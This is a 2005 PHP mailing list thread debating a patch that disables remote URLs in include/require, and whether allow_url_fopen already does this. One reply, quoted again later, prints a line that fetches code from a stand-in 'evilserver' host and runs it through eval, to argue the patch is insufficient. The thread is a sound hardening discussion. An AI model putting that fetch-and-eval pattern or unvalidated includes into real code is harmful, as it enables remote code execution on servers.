[PHP] Re: patch to php 4.3.10 to disabling URL wrappers in include like statements
Tom Z. Meinlschmidt wrote: Hi, I've experienced a lot of attacks in my hosting server due to silly users and their scripts with holes. So I prepared this little patch to 4.3.10, which disables using url wrappers in include/include_once/require/require_once statemens (switchable in php.ini). See readme.security from patch patch is there: http://orin.meinlschmidt.org/~znouza/php_patch.txt comments are welcome /tom http://php.net/manual/en/ini.php#ini.list allow_url_fopen = 0 -- Teach a man to fish... NEW? | http://www.catb.org/~esr/faqs/smart-questions.html STFA | http://marc.theaimsgroup.com/?l=php-generalw=2 STFM | http://php.net/manual/en/index.php STFW | http://www.google.com/search?q=php LAZY | http://mycroft.mozdev.org/download.html?name=PHPsubmitform=Find+search+plugins signature.asc Description: OpenPGP digital signature
Re: [PHP] Re: patch to php 4.3.10 to disabling URL wrappers in include like statements
On Wednesday 02 March 2005 22:03, Jason Barnett wrote: Tom Z. Meinlschmidt wrote: which disables using url wrappers in include/include_once/require/require_once statemens (switchable in http://php.net/manual/en/ini.php#ini.list allow_url_fopen = 0 I haven't had a look at the patch in question but from my understanding of the description above, after the application of the patch the filesystem functions (ie fopen and friends) should still be able to use URLs. Effectively it allows finer control over opening URLs. I would like to think that the OP wouldn't go to the trouble of creating a patch (for the latest release of PHP no less) for functionality that already exists! IIRC a request for something similar was made on the list some time ago. -- Jason Wong - Gremlins Associates - www.gremlins.biz Open Source Software Systems Integrators * Web Design Hosting * Internet Intranet Applications Development * -- Search the list archives before you post http://marc.theaimsgroup.com/?l=php-general -- New Year Resolution: Ignore top posted posts -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: patch to php 4.3.10 to disabling URL wrappers in include like statements
Tell me - how do you want to turn off remote includes and remain remote file working? allow_url_fopen turns off _both_. There's no choice what to disable tom Jason Barnett wrote: Tom Z. Meinlschmidt wrote: Hi, I've experienced a lot of attacks in my hosting server due to silly users and their scripts with holes. So I prepared this little patch to 4.3.10, which disables using url wrappers in include/include_once/require/require_once statemens (switchable in php.ini). See readme.security from patch patch is there: http://orin.meinlschmidt.org/~znouza/php_patch.txt comments are welcome /tom http://php.net/manual/en/ini.php#ini.list allow_url_fopen = 0 -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: patch to php 4.3.10 to disabling URL wrappers in include like statements
Tom Z Meinlschmidt wrote:
Tell me - how do you want to turn off remote includes and remain remote
file working?
Change the PHP source?
That's the only viable answer I can think of; though I doubt it's one you
want to hear/use.
Sorry.
allow_url_fopen turns off _both_. There's no choice what to disable
Consider this:
?php
eval(implode('',file(http://evilserver.example.com;)));
?
So, like, what's the point to turning off only remote include and keeping
remote file?
Maybe you'll stop a naive newbie from something stupid, but probably not
even slow down a script kiddie, much less a dedicated attacker.
For that matter, even a naive newbie would be able to figure out the
eval(file()) solution or Google for it and find it in less than an hour.
If you turn off eval, they make a file 777 (ugh!) and then read the remote
file, write it into their 777 file, and then include that.
If you don't trust remote include, you can't trust remote files and vice
versa. That's all there is to it, really.
Anything else is simply self-delusions of security imho. [shrug]
--
Like Music?
http://l-i-e.com/artists.htm
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: patch to php 4.3.10 to disabling URL wrappers in include like statements
On Thursday 03 March 2005 03:04, Richard Lynch wrote:
Tom Z Meinlschmidt wrote:
Tell me - how do you want to turn off remote includes and remain
remote file working?
Change the PHP source?
That's the only viable answer I can think of; though I doubt it's one
you want to hear/use.
Sorry.
Funnily enough I think you'll find that he did (change the source) :)
allow_url_fopen turns off _both_. There's no choice what to disable
Consider this:
?php
eval(implode('',file(http://evilserver.example.com;)));
?
So, like, what's the point to turning off only remote include and
keeping remote file?
I believe you're missing the point of the patch. It is to prevent people
from injecting malicious remote locations in $somewhere:
include($somewhere);
Of course one should always validate $somwhere before using it but ...
--
Jason Wong - Gremlins Associates - www.gremlins.biz
Open Source Software Systems Integrators
* Web Design Hosting * Internet Intranet Applications Development *
--
Search the list archives before you post
http://marc.theaimsgroup.com/?l=php-general
--
New Year Resolution: Ignore top posted posts
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
